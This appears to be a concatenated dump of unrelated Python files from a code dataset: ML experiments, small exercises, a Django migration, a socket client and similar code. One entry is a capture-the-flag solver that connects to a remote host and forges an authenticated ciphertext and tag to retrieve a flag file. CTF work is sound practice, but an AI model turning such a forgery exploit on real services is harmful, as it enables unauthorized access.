x_train, x_test, y_train, y_test = dataset
scaler = StandardScaler()
x_train_scaled = torch.from_numpy(scaler.fit_transform(x_train)).float().to(device)
x_test_scaled = torch.from_numpy(scaler.transform(x_test)).float().to(device)
explainer = shap.GradientExplainer(classifier, x_train_scaled, local_smoothing=0.2)
shap_values = explainer.shap_values(x_test_scaled, nsamples=100)
return shap_values
def permutation_importance(dataset, classifier):
device = 'cuda:0'
classifier.to(device)
x_train, x_test, y_train, y_test = dataset
scaler = StandardScaler()
x_train_scaled = scaler.fit_transform(x_train)
x_test_scaled = scaler.transform(x_test)
base_score, score_decreases = get_score_importances(classifier.score, x_test_scaled, y_test)
perm_importances = np.mean(score_decreases, axis=0)
return perm_importances
def get_accs(n_feats, observations):
accs = list()
inform_feats = set(range(n_feats // 2))
for i in range(len(observations)):
obs_feats = set(np.argsort(abs(observations[i]))[::-1][:n_feats//2])
accs.append(len(inform_feats.intersection(obs_feats)) / (n_feats//2))
return accs
def get_pearson(truth, test_acc, observations):
stat = list()
pvalue = list()
for i in range(len(observations)):
if i == 2:
stat_i, pvalue_i = pearsonr(test_acc - truth, test_acc-observations[i])
else:
stat_i, pvalue_i = pearsonr(test_acc-truth, np.abs(observations[i]))
stat.append(stat_i)
pvalue.append(pvalue_i)
return stat, pvalue
def get_spearman(truth, test_acc, observations):
stat = list()
pvalue = list()
for i in range(len(observations)):
stat_i, pvalue_i = spearmanr(np.argsort(test_acc-truth), np.argsort(np.abs(observations[i])))
stat.append(stat_i)
pvalue.append(pvalue_i)
return stat, pvalue
def main():
n_datasets = 10000
nodes = [100, 500, 1000, 2000, 5000]
epochs = [300, 300, 350, 350, 350]
accuracy_results = np.empty((n_datasets, len(nodes), 5))
spearman_stats = np.empty((n_datasets, len(nodes), 3))
spearman_pvalues = np.empty((n_datasets, len(nodes), 3))
pearson_stats = np.empty((n_datasets, len(nodes), 3))
pearson_pvalues = np.empty((n_datasets, len(nodes), 3))
for i in range(n_datasets):
dataset = gen_data()
for j in range(len(nodes)):
truth, classifier, (tt_acc), dataset = train_net(dataset, nodes[j], epochs[j])
print('Finished Truth')
influences = normalize(influence_approx(dataset, classifier).reshape(1, -1))[0]
print('Finished Influence')
shap_values = np.mean(np.mean(np.dstack(gradient_shap(dataset, classifier)), axis=2), axis=0).squeeze()
print('Finished SHAP')
permutation = permutation_importance(dataset, classifier)
print('Finished Permutation')
infl_acc, shap_acc, permute_acc = get_accs(dataset[0].shape[1], (influences, shap_values, permutation))
pearson_stat, pearson_pvalue = get_spearman(truth, tt_acc[1], (influences, shap_values, permutation))
spearman_stat, spearman_pvalue = get_spearman(truth, tt_acc[1], (influences, shap_values, permutation))
accuracy_results[i, j, :] = [tt_acc[0].item(), tt_acc[1].item(), infl_acc, shap_acc, permute_acc]
spearman_stats[i, j, :] = spearman_stat
spearman_pvalues[i, j, :] = spearman_pvalue
pearson_stats[i, j, :] = pearson_stat
pearson_pvalues[i, j, :] = pearson_pvalue
print('{}/{}'.format(i, n_datasets))
if i % 100 == 0:
np.save(os.getcwd()+ '/results/accuracies_width_{}.npy'.format(i), accuracy_results)
np.save(os.getcwd()+ '/results/pearson_width_{}.npy'.format(i), pearson_stats)
np.save(os.getcwd() + '/results/pearson_pvalue_width_{}.npy'.format(i), pearson_pvalues)
np.save(os.getcwd() + '/results/spearman_width_{}.npy'.format(i), spearman_stats)
np.save(os.getcwd() + '/results/spearman_pvalue_width_{}.npy'.format(i), spearman_pvalues)
np.save(os.getcwd() + '/results/accuracies_width_final.npy', accuracy_results)
np.save(os.getcwd() + '/results/pearson_width_final.npy', pearson_stats)
np.save(os.getcwd() + '/results/pearson_pvalue_width_final.npy', pearson_pvalues)
np.save(os.getcwd() + '/results/spearman_width_final.npy', spearman_stats)
np.save(os.getcwd() + '/results/spearman_pvalue_width_final.npy', spearman_pvalues)
if __name__ == '__main__':
main()
|
993,477 | a3345bbd63cab053cb7ae34e2a2d8ef77c261444 | import socket
import sys
from gui import ClientGUI
# Create a new client socket and connect to the server
def create_connection(server_address):
client = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
client.connect((server_address))
return client
# create components, start threads
def run(server_ip, server_port):
client = create_connection((server_ip, server_port))
# create a GUI class object, which bears the application loop
gui = ClientGUI(client)
if __name__ == "__main__":
if len(sys.argv) == 3:
server_ip = sys.argv[1]
server_port = int(sys.argv[2])
run(server_ip, server_port)
else:
print('Usage: python3 client.py <serverip> <serverport>')
|
993,478 | 12229bd529d9b4773f911c88f0846ca7338de451 | import sys
sys.stdin = open('21_input.txt')
dr = [-1, 1, 0, 0]
dc = [0, 0, -1, 1]
def dfs(sr, sc):
global arr, visited, N, L, count
S = [(sr, sc)]
visited[sr][sc] = 1
num = 1
cnt = 1
while S:
r, c = S.pop()
for i in range(4):
nr = r + dr[i]
nc = c + dc[i]
if not (0 <= nr < N and 0 <= nc <N):
continue
if arr[nr][nc] == 0:
continue
if visited[nr][nc]:
continue
S.append((nr, nc))
visited[nr][nc] = num
cnt += 1
num += 1
L.append(cnt)
N = int(input())
arr = [list(map(int, input())) for _ in range(N)]
visited = [[0] * N for _ in range(N)]
L = []
count = 0
for i in range(N):
for j in range(N):
if arr[i][j] == 1 and visited[i][j] == 0:
dfs(i, j)
count += 1
print(count)
for i in sorted(L):
print(i) |
993,479 | c6c80390c5c245e105004c12d621411309525015 | #!/usr/bin/env python3
#-------------------------------------------------------------------------------
# O(n) solution
class Solution(object):
def addDigits(self, num):
"""
:type num: int
:rtype: int
"""
return self.addDigits(sum(int(i) for i in str(num))) if num>=10 else num
#-------------------------------------------------------------------------------
# O(1) Solution
class Solution(object):
def addDigits(self, num):
if num == 0:
return 0
elif num % 9 == 0:
return 9
else:
return num % 9
#-------------------------------------------------------------------------------
|
993,480 | 1c4845a52823c04fefa6aa15b2d13ff4ea66c940 | string = input("Mata in en textsträng: ").lower().replace(" ", "")
print(f"{len(string)}")
if string == string[::-1]:
print("Textsträngen är en palindrom")
else:
print("Textsträngen är inte en palindrom") |
993,481 | d2ef86a0137816a2569ad2bdbd3b75c65817ae62 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-03-07 12:17
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cms', '0006_auto_20160305_2005'),
]
operations = [
migrations.CreateModel(
name='Attachment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='\u540d\u79f0')),
('intro', models.TextField(blank=True, null=True, verbose_name='\u7b80\u4ecb')),
('content', models.FileField(upload_to='uploads/', verbose_name='\u5185\u5bb9')),
],
options={
'verbose_name': '\u6587\u4ef6',
'verbose_name_plural': '\u6587\u4ef6',
},
),
migrations.RemoveField(
model_name='article',
name='cover_url',
),
]
|
993,482 | 1cf3d27d0b454b25874058bff88f978dea00e29d | #!/local/anaconda/bin/python
# IMPORTANT: leave the above line as is.
import logging
import sys
import numpy as np
lines = 0
avgs = None
for line in sys.stdin:
line = line.strip()
k, v = line.split(', ')
coef = np.fromstring(v, sep=" ",dtype='double')
if avgs is None:
avgs = np.zeros(coef.size)
lines += 1
for i in xrange(0, coef.size):
avgs[i] += coef[i]
for i in xrange(0, avgs.size):
avgs[i] /= lines
list = avgs.tolist()
print(' '.join([str(f) for f in list]))
|
993,483 | 4f162792fdb26dc061a5c48a21933586afd76f67 | from pwn import *
BLOCKSIZE = 16
def xor(a,b):
return bytes([x^y for x,y in zip(a,b)])
class Block:
def __init__(self, data = b''):
self.data = data
def double(self):
assert(len(self.data) == BLOCKSIZE)
x = int.from_bytes(self.data, 'big')
n = BLOCKSIZE * 8
mask = (1 << n) - 1
if x & (1 << (n - 1)):
x = ((x << 1) & mask) ^ 0b10000111
else:
x = (x << 1) & mask
return Block(x.to_bytes(BLOCKSIZE, 'big'))
r = remote('34.82.101.212', 20000)
r.sendlineafter('> ', '1')
nonce = bytes.fromhex('0'*32)
target = bytes.fromhex('0'*30+'01')
plain = target + int(128).to_bytes(16, 'big') + nonce
r.sendlineafter('nonce = ',nonce.hex())
r.sendlineafter('plain = ',plain.hex())
c = bytes.fromhex(r.recvline()[9:-1].decode())
t = bytes.fromhex(r.recvline()[6:-1].decode())
r.sendlineafter('> ', '2')
r.sendlineafter('nonce = ',nonce.hex())
r.sendlineafter('cipher = ',(c[:16]+xor(c[16:32],xor(target, int(128).to_bytes(16, 'big')))).hex())
r.sendlineafter('tag = ',xor(c[32:],nonce).hex())
a = r.recvline()
m = bytes.fromhex(r.recvline()[8:-1].decode())
L = int.from_bytes(bytes([x ^ y for x, y in zip(m[16:],int(129).to_bytes(16, 'big'))]), 'big')
if L % 2:
L ^= 0b10000111
L //= 2
L += 2**127
else:
L //= 2
L = bytes.fromhex(hex(L)[2:].rjust(32,'0'))
nonce = xor(target,L)
L = xor(c[:16],L)
L2= Block(L).double().data
L4= Block(L2).double().data
newL4 = L4
L4s = []
p = int(120).to_bytes(16,'big')
for i in range(256):
s = b'giveme flag.txt'+i.to_bytes(1,'big')
s2 = xor(xor(s, L2), L4)
p += xor(s2, newL4)
L4s.append(newL4)
newL4 = Block(newL4).double().data
r.sendlineafter('> ', '1')
r.sendlineafter('nonce = ',nonce.hex())
r.sendlineafter('plain = ',(p+nonce).hex())
c2 = bytes.fromhex(r.recvline()[9:-1].decode())
t2 = bytes.fromhex(r.recvline()[6:-1].decode())
pad = xor(c2[:16],L2)
i = pad[-1]
c_ans = xor(pad, b'giveme flag.txt')
t_ans = xor(c2[16*(i+1):16*(i+2)], L4s[i])
#print(nonce.hex(), c_ans.hex(), t_ans.hex())
r.sendlineafter('> ', '3')
r.sendlineafter('nonce = ',nonce.hex())
r.sendlineafter('cipher = ',c_ans.hex())
r.sendlineafter('tag = ',t_ans.hex())
r.interactive()
|
993,484 | 3ef0e3e1797aa0603712d2b6df408c6d6be9cc0b | import argparse
import copy
import logging
import os
import sys
import time
from pathlib import Path
from typing import Callable, Iterable, List, Union
import pytorch_lightning as pl
import wandb
from hydra import compose, initialize, initialize_config_dir
from hydra.utils import instantiate, to_absolute_path
from omegaconf import OmegaConf, open_dict
from src.utils.exptool import (
Experiment,
prepare_trainer_config,
print_config,
register_omegaconf_resolver,
)
register_omegaconf_resolver()
logging.basicConfig(
format="[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s",
level=logging.INFO,
)
logger = logging.getLogger(__name__)
main_dir = Path(__file__).resolve().parent
# ======================================================
# testing override functions
# ======================================================
def default_override(config):
# adjust values for devices
config.pl_trainer.num_nodes = 1
config.pl_trainer.devices = 1
# larger batch size for testing
config.dataset.batch_size = config.dataset.batch_size * 2
return config
def test_original(config):
return config
def test_example(config):
config_dir = main_dir / "conf"
with initialize_config_dir(config_dir=str(config_dir)):
cfg = compose(config_name="train", overrides=["experiment=mnist_lenet"])
# For example, test the model on a different dataset.
# (Just for example, actually they share the same dataset here.)
config.dataset = cfg.dataset
return config
# ======================================================
# end of testing override functions
# ======================================================
# ======================================================
# testing pipeline
# ======================================================
def test(
logdir: Union[str, Path],
ckpt: Union[str, Path] = "best",
update_config_func: Union[Callable, List[Callable]] = test_original,
update_wandb: bool = False,
wandb_entity: str = None,
metrics_prefix: Union[str, List[str]] = "",
):
logdir = Path(logdir).expanduser()
os.chdir(logdir)
# load experiment record from logdir
experiment = Experiment(logdir, wandb_entity=wandb_entity)
# deal with update_config_func & metrics_prefix
if not isinstance(update_config_func, Iterable):
update_config_func = [update_config_func]
if isinstance(metrics_prefix, str):
metrics_prefix = [metrics_prefix]
if len(metrics_prefix) == 1 and len(update_config_func) > 1:
metrics_prefix = [metrics_prefix[0]] * len(update_config_func)
assert len(update_config_func) == len(
metrics_prefix
), "update_config_func and metrics_prefix must have the same length"
for func, prefix in zip(update_config_func, metrics_prefix):
# override experiment config with default_override & update_config_func
config = copy.deepcopy(experiment.config)
OmegaConf.set_struct(config, True)
with open_dict(config):
config = default_override(config)
if func is not None:
logger.info(
f"\n===== Override experiment config with {func.__name__} ====="
)
config = func(config)
# show experiment config
print_config(config)
# seed everything
pl.seed_everything(config.seed)
# initialize datamodule
datamodule = instantiate(config.dataset)
# initialize model
pipeline = experiment.get_pipeline_model_loaded(ckpt, config=config)
# initialize trainer
cfg_trainer = prepare_trainer_config(config, logging=False)
trainer = pl.Trainer(**cfg_trainer)
# testing
results = trainer.test(pipeline, datamodule=datamodule)
if trainer.global_rank == 0:
# log results
prefix_link = (
"" if len(prefix) == 0 or prefix.endswith("_") else "_"
)
results = [
{
f"{prefix}{prefix_link}{key}": val
for key, val in result.items()
}
for result in results
]
logger.info(f"{results}")
# save results to file
with open(logdir / "results.jsonl", "a") as f:
record = {
"results": results,
"date": time.strftime("%Y-%m-%d %H:%M:%S"),
"func": func.__name__ if func is not None else "original",
"prefix": prefix,
}
f.write(f"{record}\n")
# update wandb record
if update_wandb:
logger.info("update wandb.")
api = wandb.Api()
run = api.run(experiment.wandb_run_path)
for result in results:
run.summary.update(result)
# ======================================================
# end of testing pipeline
# ======================================================
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("logdir")
parser.add_argument("--ckpt", default="last")
parser.add_argument(
"--update_func",
nargs="+",
default=["test_original"],
help="config update function",
)
parser.add_argument("--update_wandb", action="store_true")
parser.add_argument("--entity", default=None)
parser.add_argument(
"--prefix", nargs="+", default="", help="wandb metrics prefix"
)
args = parser.parse_args()
# name to funcs
if args.update_func is None:
args.update_func = [None]
else:
mod = sys.modules[__name__]
update_config_func = [getattr(mod, func) for func in args.update_func]
test(
args.logdir,
ckpt=args.ckpt,
update_config_func=update_config_func,
update_wandb=args.update_wandb,
wandb_entity=args.entity,
metrics_prefix=args.prefix,
)
|
993,485 | 8c236a9ed17f524841c80bed7decca8d2f4249e5 | """ GrantRevokeMenu class module.
"""
from functools import partial
from typing import List, Callable, Tuple
from http.client import HTTPException
from dms2021client.data.rest import AuthService
from dms2021client.presentation.orderedmenu import OrderedMenu
from dms2021client.data.rest.exc import NotFoundError, UnauthorizedError
from colorama import Fore # type: ignore
class GrantRevokeMenu(OrderedMenu):
""" Grant or revoke rights.
"""
_username: str = ""
def __init__(self, session_token: str, auth_service: AuthService, option: int):
""" Constructor method.
Initializes the variables.
---
Parameters:
- session_token: The session_token of the user string.
- authservice: REST cliente to connect to the authentication service authservice.
- option: 1, grant, 2, revoke.
"""
self.__session_token: str = session_token
self.__authservice: AuthService = auth_service
self.__option: int = option
self.__repeat = False
def set_title(self) -> None:
""" Sets the menu title.
"""
if self.__option == 1:
self._ordered_title = "AÑADIR PERMISOS"
else:
self._ordered_title = "ELIMINAR PERMISOS"
def set_items(self) -> None:
""" Sets the menu items.
"""
if not self.__repeat:
self._username: str = input("Introduzca el nombre del usuario: ")
self._ordered_items = self.get_rights()[0]
if not self._ordered_items:
if self.__option == 1:
self.print_error("El usuario ya tiene todos los permisos.")
return
self.print_error("El usuario no tiene ningún permiso.")
return
def set_opt_fuctions(self) -> None:
""" Sets the function that will be executed when you select one option.
"""
self._ordered_opt_functions = self.get_rights()[1]
def get_rights(self) -> Tuple[List[str], List[Callable]]:
""" Gets rights of a user (what he has or not depends on the option)
---
Parameters:
- param: 0, return the rights, 1, return the functions.
Returns:
- right_result: The rights a user has o not.
- functions: The functions to execute.
"""
rights: List[str] = ["AdminRights", "AdminUsers", "AdminRules", "AdminSensors",
"ViewReports"]
functions: List[Callable] = []
right_result: List[str] = []
for i in rights:
if self.__authservice.has_right(self._username, i) and self.__option == 2:
right_result.append(i)
fun = partial(self.manage_rights, i, False)
functions.append(fun)
elif not self.__authservice.has_right(self._username, i) and self.__option == 1:
right_result.append(i)
fun = partial(self.manage_rights, i)
functions.append(fun)
return right_result, functions
def manage_rights(self, right: str, grant: bool = True):
""" Grants or revokes rights.
---
Parameters:
- right: Right to be revoked or granted.
- grant: False, revoke, True, grant.
"""
try:
if not grant:
self.__authservice.revoke(self._username, right, self.__session_token)
print(Fore.GREEN
+ f"El permiso {right} ha sido eliminado del usuario {self._username}.\n"
+ Fore.RESET)
else:
self.__authservice.grant(self._username, right, self.__session_token)
print(Fore.GREEN
+ f"El permiso {right} ha sido añadido al usuario {self._username}.\n"
+ Fore.RESET)
self.__repeat = True
except UnauthorizedError:
self.print_error("Usted no tiene permiso para cambiar permisos.")
except NotFoundError:
self.print_error("No se pueden modificar permisos de un usuario inexistente.")
except HTTPException:
self.print_error("Ha ocurrido un error inesperado.")
|
993,486 | becb8c2b9f90a8ba5fd7429ff745d527b363c06f | # -*- coding: utf8 -*-
import sys
from time import sleep
from snapconnect import snap
SERIAL_TYPE = snap.SERIAL_TYPE_RS232
class BridgeVersionClient(object):
def __init__(self, path, nodeAddress, message):
print 'init conn2'
self.path=path
self.nodeAddress=nodeAddress
self.message=message
#Создаем экземпляр SnapConnect
self.comm = snap.Snap(funcs = {'reportLightState': self.start})
self.comm.set_hook(snap.hooks.HOOK_SNAPCOM_OPENED, self.hook_open)
self.comm.set_hook(snap.hooks.HOOK_SNAPCOM_CLOSED, self.hook_closed)
#self.comm.set_hook(snap.hooks.HOOK_10MS, self.make_poll)
self.comm.loop()
def start(self, m):
print 'm'
self.comm.poll()
def make_poll(self):
self.comm.poll()
def hook_open(*args):
print "SNAPCOM OPENED: %r" % (args,)
print 'open'
def hook_closed(*args):
print "SNAPCOM CLOSED: %r" % (args,)
print 'closed'
def sendMessage(self, packet):
# Открываем последовательный порт по заданному пути
self.comm.open_serial(SERIAL_TYPE, self.path)
#Отправляем сообщение на ноду через RPC
for message in packet:
self._prnstr(message)
a=self.comm.rpc(self.nodeAddress, 'writePacket', message)
print 'snap ', a
self.comm.poll()
sleep(1)
#self.comm.poll()
self.comm.loop()
#self.comm.set_hook(snap.hooks.HOOK_RPC_SENT)
#snap.Snap.set_hook(snap.hooks.HOOK_RPC_SENT)
#def a(self, p1, p2):
#print 'hook ', p1, p2
#self.comm.loop()
#for b in message:
# self.comm.rpc(self.nodeAddress, 'sendPacket', b, 200)
# self.comm.poll()
# sleep(0.3)
#self.comm.loop()
#self.stop()
def clearScreen(self):
# Открываем последовательный порт по заданному пути
self.comm.open_serial(SERIAL_TYPE, self.path)
#Отправляем сообщение на ноду через RPC
print 'sending clear'
self.comm.rpc(self.nodeAddress, 'clear1')
#self.comm.poll()
self.comm.loop()
#sleep(2)
#self.stop()
def stop(self):
"""Stop the SNAPconnect instance."""
print 'closing'
self.comm.close_all_serial() # Close all serial connections opened with SNAPconnect
print 'closed'
sys.exit(0) # Exit the program
def _prnstr(self, outstr):
print outstr
for i in range (0, len(outstr)):#st in outstr:
st=outstr[i]
newLabel = ord(st)
h=hex(newLabel)
hh=(h[2:])
if len(hh)<2:
hh='0'+hh
p=hh.decode('hex')
s='n'
if p=='\x00':
s='0'
elif p=='\x01':
s='SOH'
elif p=='\x02':
s='STX'
elif p=='\x41':
s='WTF'
elif p=='\x1B':
s='1B'
elif p=='\x30':
s='DisP:0'
elif p=='\x20':
s='20'
elif p=='\x45':
s='WrSpecFunk'
elif p=='\x24':
s='ClearMem'
elif p=='\x55':
s='IR'
elif p=='\x04':
s='EOT'
elif p=='\x1C':
s='setColor'
s=s+' | '
print s, |
993,487 | a024d48d3b125cb2cf78c7f11bab50a41c1a64ab | class Solution:
def bitwiseComplement(self, N: int) -> int:
if N==0:
return 1
cur=1
rep=0
while N>0:
if N&1==1:
cur*=2
N>>=1
else:
rep+=cur
cur*=2
N>>=1
return rep
|
993,488 | b304e1f8654aade278502eec132151546e453969 | from __future__ import print_function
import os
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.utils.data
from torch.autograd import Variable
import torch.nn.functional as F
from collections import OrderedDict
import numpy as np
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(BASE_DIR, 'nndistance'))
from models.nndistance.modules.nnd import NNDModule
distChamfer = NNDModule()
USE_CUDA = True
class ConvLayer(nn.Module):
def __init__(self):
super(ConvLayer, self).__init__()
# (2048,6)
self.conv1 = torch.nn.Conv1d(6, 64, 1) # Conv1D
self.conv2 = torch.nn.Conv1d(64, 128, 1)
self.bn1 = nn.BatchNorm1d(64) # Norm
self.bn2 = nn.BatchNorm1d(128)
def forward(self, x):
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
# print(x.size()) (4,128,2048)
return x
class PrimaryPointCapsLayer(nn.Module):
def __init__(self, prim_vec_size=8, num_points=2048):
super(PrimaryPointCapsLayer, self).__init__()
# 共16结构
self.capsules = nn.ModuleList([
torch.nn.Sequential(OrderedDict([
('conv3', torch.nn.Conv1d(128, 1024, 1)), # (4,1024,2048)
('bn3', nn.BatchNorm1d(1024)), # Norm
('mp1', torch.nn.MaxPool1d(num_points)), # (4,1024,1)
]))
for _ in range(prim_vec_size)])
def forward(self, x):
u = [capsule(x) for capsule in self.capsules] # 胶囊数
# print("u[0].size" , u[0].size())
# (4,1024,1)
u = torch.stack(u, dim=2)
# print(u.size())
return self.squash(u.squeeze())
# activation
def squash(self, input_tensor):
squared_norm = (input_tensor ** 2).sum(-1, keepdim=True)
# print("square",squared_norm.size())
# (4,1024,1)
output_tensor = squared_norm * input_tensor / \
((1. + squared_norm) * torch.sqrt(squared_norm))
if (output_tensor.dim() == 2):
output_tensor = torch.unsqueeze(output_tensor, 0)
return output_tensor
class LatentCapsLayer(nn.Module):
def __init__(self, latent_caps_size=16, prim_caps_size=1024, prim_vec_size=16, latent_vec_size=64):
super(LatentCapsLayer, self).__init__()
self.prim_vec_size = prim_vec_size
self.prim_caps_size = prim_caps_size
self.latent_caps_size = latent_caps_size
self.W = nn.Parameter(0.01 * torch.randn(latent_caps_size, prim_caps_size, latent_vec_size, prim_vec_size))
# self.W.requires_grad=False
# self.W = 0.01*torch.randn(latent_caps_size, prim_caps_size, latent_vec_size, prim_vec_size).cuda()
# self.W.requires_grad_(True)
def forward(self, x):
u_hat = torch.squeeze(torch.matmul(self.W, x[:, None, :, :, None]), dim=-1)
# print(u_hat.requires_grad) True
u_hat_detached = u_hat.detach()
# print(u_hat_detached.requires_grad) false
b_ij = Variable(torch.zeros(x.size(0), self.latent_caps_size, self.prim_caps_size)).cuda()
num_iterations = 3
for iteration in range(num_iterations):
c_ij = F.softmax(b_ij, 1)
if iteration == num_iterations - 1:
v_j = self.squash(torch.sum(c_ij[:, :, :, None] * u_hat, dim=-2, keepdim=True))
else:
v_j = self.squash(torch.sum(c_ij[:, :, :, None] * u_hat_detached, dim=-2, keepdim=True))
b_ij = b_ij + torch.sum(v_j * u_hat_detached, dim=-1)
return v_j.squeeze(-2)
def squash(self, input_tensor):
squared_norm = (input_tensor ** 2).sum(-1, keepdim=True)
output_tensor = squared_norm * input_tensor / \
((1. + squared_norm) * torch.sqrt(squared_norm))
# print(output_tensor.size()) (4,32,1,16)
return output_tensor
class PointGenCon(nn.Module):
def __init__(self, bottleneck_size=2500):
self.bottleneck_size = bottleneck_size
super(PointGenCon, self).__init__()
self.conv1 = torch.nn.Conv1d(self.bottleneck_size, self.bottleneck_size, 1)
self.conv2 = torch.nn.Conv1d(self.bottleneck_size, int(self.bottleneck_size / 2), 1)
self.conv3 = torch.nn.Conv1d(int(self.bottleneck_size / 2), int(self.bottleneck_size / 4), 1)
self.conv4 = torch.nn.Conv1d(int(self.bottleneck_size / 4), 3, 1)
self.th = torch.nn.Tanh()
self.bn1 = torch.nn.BatchNorm1d(self.bottleneck_size)
self.bn2 = torch.nn.BatchNorm1d(int(self.bottleneck_size / 2))
self.bn3 = torch.nn.BatchNorm1d(int(self.bottleneck_size / 4))
def forward(self, x):
# print(x.size()) (4,18,32)
x = F.relu(self.bn1(self.conv1(x)))
# print("1",x.size()) (4,18,32)
x = F.relu(self.bn2(self.conv2(x)))
# print("2",x.size()) (4,9,32)
x = F.relu(self.bn3(self.conv3(x)))
# print("3",x.size()) (4,4,32)
x = self.th(self.conv4(x))
# print("4",x.size()) (4,3,32)
return x
class CapsDecoder(nn.Module):
def __init__(self, latent_caps_size, latent_vec_size, num_points):
super(CapsDecoder, self).__init__()
self.latent_caps_size = latent_caps_size #32
self.bottleneck_size = latent_vec_size #16
self.num_points = num_points
self.nb_primitives = int(num_points / latent_caps_size) #2048/32 = 64
self.decoder = nn.ModuleList(
[PointGenCon(bottleneck_size=self.bottleneck_size + 2) for i in range(0, self.nb_primitives)])
def forward(self, x):
#print(x.size()) (8,32,16)
outs = []
for i in range(0, self.nb_primitives):
rand_grid = Variable(torch.cuda.FloatTensor(x.size(0), 2, self.latent_caps_size))
#print(rand_grid.size()) #(8,2,32)
rand_grid.data.uniform_(0, 1)
y = torch.cat((rand_grid, x.transpose(2, 1)), 1).contiguous()
# print(y.size())(8,18,32)
outs.append(self.decoder[i](y))
#print(outs[i].size()) #(8,3,32)
# B
# print(outs.size())
# out_mean = torch.cat(outs,0).reshape(-1,4,3,self.latent_caps_size).contiguous()
# out_mean = torch.mean(out_mean,dim=0).contiguous()
out_mean = torch.zeros((32,3,self.latent_caps_size)).cuda()
for i in range(len(outs)):
out_mean = out_mean + outs[i]
out_mean = out_mean/self.nb_primitives
# out_mean = out_mean
#print(out_mean.size()) ([8, 3, 32])
#print(torch.cat(outs, 0).reshape(-1,8,3,32).size())
#(64,4,3,32)
# print(torch.cat(outs, 2).size()) (8,3,2048)
#(4,3,2048)
return torch.cat(outs, 2).contiguous(),out_mean
class PointCapsNet(nn.Module):
def __init__(self, prim_caps_size, prim_vec_size, latent_caps_size, latent_vec_size,
num_points): # (1024,16,32,16,2048)
super(PointCapsNet, self).__init__()
self.conv_layer = ConvLayer()
self.primary_point_caps_layer = PrimaryPointCapsLayer(prim_vec_size, num_points)
self.capsule_groups_layer = PointGenCon(latent_vec_size + 2)
self.latent_caps_layer = LatentCapsLayer(latent_caps_size, prim_caps_size, prim_vec_size, latent_vec_size)
self.caps_decoder = CapsDecoder(latent_caps_size, latent_vec_size, num_points)
def forward(self, data):
#print("1",data.size()) (8,3,2048)
#print("data",data)
x1 = self.conv_layer(data)
x2 = self.primary_point_caps_layer(x1)
latent_capsules = self.latent_caps_layer(x2)
# print(latent_capsules.size()) (8,32,16)
reconstructions,cap_Group = self.caps_decoder(latent_capsules)
# print(reconstructions.size()) (8,3,2048)
# print(cap_Group.size())
# (4,3,32)
# print("cap_Group",cap_Group)
return latent_capsules, reconstructions , cap_Group, x2
def loss(self, data, reconstructions):
return self.reconstruction_loss(data, reconstructions)
def reconstruction_loss(self, data, reconstructions):
data_ = data.transpose(2, 1).contiguous()
reconstructions_ = reconstructions.transpose(2, 1).contiguous()
dist1, dist2 = distChamfer(data_, reconstructions_)
loss = (torch.mean(dist1)) + (torch.mean(dist2))
return loss
class PointCapsNetDecoder(nn.Module):
def __init__(self, prim_caps_size, prim_vec_size, digit_caps_size, digit_vec_size, num_points):
super(PointCapsNetDecoder, self).__init__()
self.caps_decoder = CapsDecoder(digit_caps_size, digit_vec_size, num_points)
def forward(self, latent_capsules):
reconstructions = self.caps_decoder(latent_capsules)
return reconstructions
|
993,489 | 548cd6a03527b5fc77fbd595c8c2794fde6c3a96 | class Solution(object):
def numTrees(self, n):
"""
:type n: int
:rtype: int
"""
count = [0] * (n+1)
count[0],count[1] = 1,1
self.do(n,count)
return count[n]
def do(self,n,count):
if count[n] > 0:
return count[n]
res = 0
for j in xrange(n):
res += self.do(j,count)*self.do(n-1-j,count)
count[n] = res
return res |
993,490 | e64050d660e41bb7b148bb9b5eb6b347f9c688e9 | x = 10;
y = 20;
x_list = [x]*10
y_list = [y]*10
allnumbers = x_list+y_list
print(allnumbers)
|
993,491 | 39bede9dcb859084491e30f90bf64f30225d0000 | from urllib import request
url = 'https://query1.finance.yahoo.com/v7/finance/download/TSLA?period1=1521654485&period2=1524332885&interval=1d&events=history&crumb=o5Eu4tetf/L'
def download_stock_data(csv_url):
response = request.urlopen(csv_url)
csv = response.read()
csv_str = str(csv)
lines = csv_str.split("\\n")
print(lines)
'''
dest_url = r'goog.csv'
fw = open(dest_url,'w')
for line in lines:
fw.write(line + "\n")
fw.close()
'''
download_stock_data(url)
|
993,492 | fe39bbf58c6467eaadbf3ec2f11f5ecd78498d69 | '''
Author: Artur Assis Alves
Date : 07/04/2020
Title : Question 9
'''
import sys
#Functions:
def is_palindrome (word):
'''
Returns True if the string 'word' is a palindrome. Returns False otherwise.
Input :
word -> string
Output:
True/False -> bool
'''
for_word = list(word)
rev_word = for_word.copy()
rev_word.reverse()
if for_word == rev_word:
return True
else:
return False
def test(did_pass):
''' Print the result of a test.
OBS: Função retirada dos slides Python 1.pptx.
'''
linenum = sys._getframe(1).f_lineno # Get the caller's line number.
if did_pass:
msg = "Test at line {0} is OK.".format(linenum)
else:
msg = "Test at line {0} FAILED.".format(linenum)
print(msg)
def test_suite():
'''
Run the suite of tests for code in this module (this file).
OBS: Função retirada dos slides Python 1.pptx.
'''
test(is_palindrome("abba"))
test(not is_palindrome("abab"))
test(is_palindrome("tenet"))
test(not is_palindrome("banana"))
test(is_palindrome("straw warts"))
test(is_palindrome("a"))
test(is_palindrome("")) #"" is a palindrome.
#Main:
if __name__=='__main__':
test_suite()
|
993,493 | 8f27989245bdd7d0582b02e1ef2788cf19d13c85 | # https://www.hackerrank.com/challenges/apple-and-orange/problem
import math
import os
import random
import re
import sys
def countApplesAndOranges(s, t, a, b, apples, oranges):
# s, t : location of Sam's house start & end
# a : location of apple tree
# b : location of orange tree
# apples: array (vector)
# oranges: array (vector)
sam_apples = 0
sam_oranges = 0
for apple_distance in apples:
apple_location = apple_distance + a
if (apple_location >= s) & (apple_location <= t):
sam_apples += 1
for orange_distance in oranges:
orange_location = orange_distance + b
if (orange_location >= s) & (orange_location <= t):
sam_oranges += 1
